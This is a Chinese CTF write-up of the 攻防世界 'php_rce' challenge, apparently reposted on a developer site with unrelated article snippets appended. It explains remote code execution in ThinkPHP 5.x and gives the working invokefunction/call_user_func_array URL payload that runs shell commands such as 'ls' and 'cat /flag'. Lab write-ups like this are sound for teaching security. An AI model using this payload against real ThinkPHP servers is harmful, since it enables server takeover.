程序员经验分享-hwhale

攻防世界web进阶区--php_rce write up

2023-10-27

打开靶机:

这道题没有什么难点,重点在于RCE的认识和thinkphp的漏洞。

那RCE是什么嘞:

RCE:远程代码执行漏洞
远程命令/代码执行漏洞,简称RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。RCE分为远程命令执行ping和远程代码执行evel。

漏洞产生的根本原因
服务器没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。

也就是说,如果thinkphp真的存在rce,我们就能通过各种指令来获取他的一些信息,包括flag的获取。

而thinkphp通过百度可知,他确实存在远程代码执行漏洞:

ThinkPHP 5.0<5.0.23&5.1<5.1.31版本在没有开启强制路由的情况下可能存在远程代码执行漏洞。攻击者通过该漏洞可能完全控制Web服务器。 

解法:网页只显示了tinkphp,我们已知thinkphp是存在漏洞的,直接Github搜索thinkphp漏洞(https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection),发现:

 

在url后面的:

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=xxxxx(命令)

就是远程代码执行漏洞啦,输入命令就返回什么 。

输入ls命令查看全部:

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

 

所以构建payload:

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

cat命令是查看,我们直接查看flag就能看到flag:

 

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

Web

经验分享

网络安全

攻防世界web进阶区--php_rce write up 的相关文章

  • 如何判断是哪个控件导致ViewState加载失败?

    我的页面面临 Viewstate 加载问题 页面有一个登录工具来登录管理员和非管理员用户 当非管理员用户登录页面并单击启用了自动回发的复选框时 会出现奇怪的行为 错误详情如下 后来我发现 在左侧的导航面板中 承载链接 侧边栏如下图所示 Se

  • Ant Design Collapse - 关闭按钮

    我是 Ant Design 的初学者 在使用 Ant Design 库中的 Collapse 和 Form 时遇到了这个问题 我已经设置了我的页面 其中添加新项目的表单位于折叠中 并且折叠下方有一个项目列表

  • 用于网站的 Git / 接收后 / 测试站点和生产站点的分离

    我使用 Git 来管理网站的源代码和部署 目前测试站点和实时站点在同一个机器上运行 关注此资源http toroid org ams git website howto http toroid org ams git website how

  • IIS 7.5:对网站的初始请求永远不会加载

    当我第一次浏览我的网站时 互联网不断旋转 加载 如果我两秒钟后尝试再次加载它 一切都会正常 就好像它 睡着了 一样 我想这一定和 回收 有关 我已将 空闲超时 设置为 0 将回收 定期时间间隔 设置为 0 在浏览我的网站之前 我查看了 工作

  • 通过站点到站点 VPN 将 Azure 网站连接到本地数据库

    我的目标是运行一个天蓝色的网站 该网站可以访问我们本地公司数据库中的数据 我按照网络上的教程设置了一个 Azure 虚拟网络 并通过站点到站点 VPN 将其连接到我们本地公司网络 在天蓝色门户中 我可以看到连接实际上正在工作 并且数据已被接

  • 清除 Laravel 队列缓存而不重新启动

    在我的应用程序中 每个客户都有一种复杂的类 我们在其中为该特定客户进行一些搜索和替换 我运行队列工作人员每天与 eBay 同步 以便每个客户进行某种搜索和替换 问题是 Laravel 队列会缓存代码很长一段时间 如果我想去更改任何客户类文件

  • 如何将 html 输入到 Flask 中?

    我有这个 html 位

  • 从 Harp.js 中的 EJS 模板调用另一个文件上的 javascript 函数

    尝试使用 Harp js 制作一个网站 我使用 ejs 模板 并希望将一些有用的 javascript 函数存储在中央文件中 我怎么做 我尝试使用 但它不起作用 似乎js文件没有被解析 有任何想法吗 谢谢 尽管有多种方法 有时 可以实现这一

  • 单击链接时启动本地应用程序

    我正在开发一个内部 Web 应用程序 它允许我为客户存储远程控制凭据 每次我想要连接到客户计算机时 我都需要启动远程支持软件 复制并粘贴用户名和密码 然后单击 开始 按钮 该软件将具有可用的命令行参数 允许我立即启动会话 但是 我不知道如何

  • HTML if 语句在 CDN 失败时加载本地 JS/CSS

    当从 CDN 或任何外部服务器加载 CSS JS 文件时 有可能 即使概率很低 由于外部故障而丢失该文件 在这种情况下 html 页面将因缺乏适当的 CSS 和 JS 而被损坏 有没有一种实用的方法可以在 CDN 故障时加载本地版本 IF

  • 在 Tomcat 上部署 Java Web 项目,无需 WAR 或 EAR

    我有一个 Java Web 项目 Struts Spring 在我的本地主机上完美运行 我必须将其部署在我的网站上 但虚拟主机提供的 Tomcat Manager 界面显示 由于安全原因 它无法上传 WAR 文件 当联系技术支持时 我被告知

  • Magento:设置刚刚创建的网站的配置值?

    我正在以编程方式创建网站 用户等 问题是 创建网站时 我无法立即设置配置值 Code

  • MVC4更新部分视图

    我正在开发一个简单的 MVC 应用程序 我有主视图 部分视图和控制器 这是我的主要视图 model partitalViewTest Models Qset div class transbox style height 1 Html Pa

  • 诸如用于测试 HTTP 请求的虚拟 REST 服务器之类的东西? [关闭]

    Closed 此问题正在寻求书籍 工具 软件库等的推荐 不满足堆栈溢出指南 help closed questions 目前不接受答案 我一直在四处寻找 但找不到任何这样的网站 我想知道是否有一些虚拟服务器可以响应测试 GET 请求并返回

  • 如何防止桌面浏览器(Chrome、Safari)缩放网页

    我尝试使用以下元视图端口标记来防止浏览器缩放 但这不起作用 我知道这是可能的 因为我的缩放在此网站上被阻止 未来主义 xyz http futurism xyz 该网站的视口标签是这样的

  • 给定数十亿个 URL,如何确定重复内容 [关闭]

    Closed 这个问题需要多问focused help closed questions 目前不接受答案 我在一次编程面试中被问到这个问题 我在下面详细描述了这个问题 这是一个开放式问题 给定数十亿个 URL 深层链接 我如何对哪些 URL

  • 您可以在不是在 Google 协作平台下创建的网站上使用 Google 脚本吗? [复制]

    这个问题在这里已经有答案了 Google 脚本有一种方法可以嵌入到 Google 网站中 但我想知道是否可以在非 Google 托管的网站上使用 Google 脚本 此 google 脚本的目的是作为 Javascript 的简单替代方案

  • 找不到模块:错误:包路径。未从包中导出

    import firebase from firebase const firebaseConfig apiKey AIzaSyBOK7x5N5UnjY4TDqndzH7l5tvdNIsWFRc authDomain todo app e3

  • 将您的应用程序链接到现有页面

    我搜索了又搜索 似乎找不到任何与此相关的信息 我们有一个 Facebook 页面 facebook com companyname 我们在 Facebook 上也有一个应用程序 apps facebook com companyname 我

  • wix 安装程序/创建网站并分配新的或现有的 Web 应用程序池

    我尝试使用 wix 安装创建一个新网站 没关系 没有问题 但我无法将新的或现有的网络应用程序池分配给新网站 iis website 标记不包含 WebAppPool 属性 我如何将网络应用程序池分配给网站 你可以在下面看到我的代码 感谢您的

随机推荐

  • Docker 进行 apt 等操作时无法连接源

    Docker 进行 apt 等操作时无法连接源 重启 Docker 参考文章 sudo service docker restart or sudo etc init d docker restart

  • 【网络安全】一段小笑话学习 加密算法+盐

    催生这篇文章的一个原因是一位讲了半天听不懂原理还不虚心学习的群友 小笑话 群友 为啥两个一样的密码一个可以登录一个不可以 群友 不同用户名 群友 A账号 B密码 C账号 B密码 居然a能登陆c提示密码错误 群友 没有改东西 想必大部分人肯定

  • Python110道常见面试题

    干货 110 道 Python 面试笔试题超强汇总 这几天好多留言问有没有Python面试题 今天统一给大家分享一遍 希望能帮助此时仍在找工作的同学 尽快找到工作 希望对基本知识不熟悉的同学 能认真做一遍 肯定会有不少收获 1 一行代码实现

  • DB2时间戳查看

    1 打开日志 确定错误是那个数据库操作造成 2 查看bnd文件的时间戳信息 db2bfd b Card bnd grep Timestamp 显示时间戳 Timestamp tA5MPfMZ 2009 12 31 15 12 56 45 3

  • linux服务器下手动删除memcache中的key对应的value

    假设服务器ip是 10 0 0 1 端口是 1234 首先连上服务器 telnet 10 0 0 1 1234 查看某个key对应的值 假设key的名称为 type get type 获取值 delete type 删除

  • Anaconda下pip离线安装Pytorch(亲测可用)

    win10 Anaconda3 python3 7 CUDA10 进入pytorch官网https pytorch org 根据自己情况选择安装 注意 我并没有在Anaconda Prompt下直接输入Run this Comman的内容

  • 2023年十大最佳自动化测试工具

    Best Automation Testing Tools for 2023 对更快交付高质量软件 或 快速质量 的需求要求组织以敏捷 持续集成 CI 和DevOps方法论来寻找解决方案 测试自动化是这些方面的重要组成部分 最新的 2018

  • ContentProvider与ContentResolver

    1 理解ContentProvider与ContentResolver 看下面这个图就行了 2 ContentProvider可以直接理解为一个public的servlet类 里面 封装了一些public 的函数 这个函数可以操作数据库 文

  • C++11 并发指南三(Lock 详解)

    C 11 并发指南三 Lock 详解 文章目录 C 11 并发指南三 Lock 详解 std lock guard 介绍 std lock guard 构造函数 std unique lock 介绍 std unique lock 构造函数

  • 深入理解Java虚拟机(四)Eden、Survivor、老年代、GC日志

    1 年轻代 1 1 Eden区和Survivor区 新生代GC Minor GC 指发生在新生代的垃圾收集动作 Minor GC非常频繁 新生代采用复制算法 一般回收速度也比较快 因为采用复制算法 所以年轻代分为三部分 1个Eden区和2个

  • java string default values_@RequestParam使用defaultValue属性设置默认值的操作

    RequestParam使用defaultValue属性设置默认值 注意设置必须是string类型的 框架自己会做转换 RequestParam value page required false defaultValue 1 Intege

  • Window窗体属性的基础简述

    Window窗体属性 1 窗口的外观 WPF中默认窗口框架的外观 主要取决于Icon Title WindowStyle ResizeMode等属 性 Icon 指定窗口的图标 Title 指定窗口的标题 WindowStyle指定窗口样式

  • jetson tx2 上部署TensorRT模型推理

    参考 https arleyzhang github io articles 7f4b25ce 1 Jetson tx2 是什么 Jetson tx2简而言之就是AI计算终端 采用 NVIDIA Pascal 构架 外形小巧 节能高效 非常

  • [Matlab]巴特沃夫滤波器设计:低通、高通、带通和带阻

    巴特沃斯滤波器的特点 1 通频带内的频率响应曲线最大限度平坦 没有起伏 而在阻频带则逐渐下降为零 2 在振幅的对数对角频率的波特图上 从某一边界角频率开始 振幅随着角频率的增加而逐步减少 趋向负无穷大 测试代码 ButterWorthFil

  • 如何把图纸转换为t3格式_怎么把图纸转换成t3格式

    cad转化成t3格式 1 打开天正 cad 3 找到图纸保存的位置 点击点开 5 选择输出类型 输入 3 8 2020 05 27 42人浏览 在CAD看图中如何将图纸转成T3格式 浩辰 CAD 看图王官方页面 http yun gstar

  • git命令基本使用(拉取,上传)

    项目从git上通过SSH拉取或上传 1 初始化文件 git init 2 绑定账号的用户名 git config global user name shopping lby 3 绑定账号的邮箱 git config global user

  • 一篇就让你了解进程的虚拟地址与物理地址是如何进行映射的

    这篇文章可以让你了解进程的虚拟地址是如何映射物理地址的 在刚开始接触虚拟地址的概念时 真的是一头雾水 不知道它到底是个什么东西 一直有这个疑惑 为什么要用虚拟地址 虚拟地址的作用是什么 经过这么多年做过的项目 积攒经验后 我可以略知一些虚拟

  • 矩阵乘法

    题目描述 计算两个矩阵的乘法 n m阶的矩阵A乘以m k阶的矩阵B得到的矩阵C 是n k阶的 且C i j A i 0 B 0 j A i 1 B 1 j A i m 1 B m 1 j 输入 第一行为n m k 表示A矩阵是n行m列 B矩

  • 愿每一个人的创造力都能被激发:剪映Mac版来了!

    在移动端上线18个月后 剪映有了PC版 11月27日 视频创作工具剪映正式推出Mac专业版 Windows版计划于明年2月上线 去年秋天 剪映的移动端上线3个月即登顶App Store中国区免费榜 本着打造简单好用的产品 降低视频创作门槛的

  • 攻防世界web进阶区--php_rce write up

    打开靶机 这道题没有什么难点 重点在于RCE的认识和thinkphp的漏洞 那RCE是什么嘞 RCE 远程代码执行漏洞 远程命令 代码执行漏洞 简称RCE漏洞 可以让攻击者直接向后台服务器远程注入操作系统命令或者代码 从而控制后台系统 RC

热门标签